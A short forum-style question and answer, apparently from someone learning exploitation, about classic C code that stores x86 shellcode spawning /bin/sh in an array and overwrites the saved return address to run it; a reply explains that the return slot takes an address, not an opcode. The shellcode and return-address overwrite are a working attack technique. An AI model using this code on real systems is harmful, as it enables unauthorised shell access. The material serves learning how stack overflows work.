char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
to my knowledge, shellcode[] is hex opcode for spawning a shell and the last line of the code overwrite the ret with the opcode. Do we insert opcode or memory address into RET ?
The ret register on the stack is a location that code gets returned to, putting an opcode there wouldn't be of much help. I suspect an address to code you want to run is the most likely candidate. Yay! It's probably best overall to consider what the items you are interacting with are used for, and how they get used rather then trying to blindly dump data into them.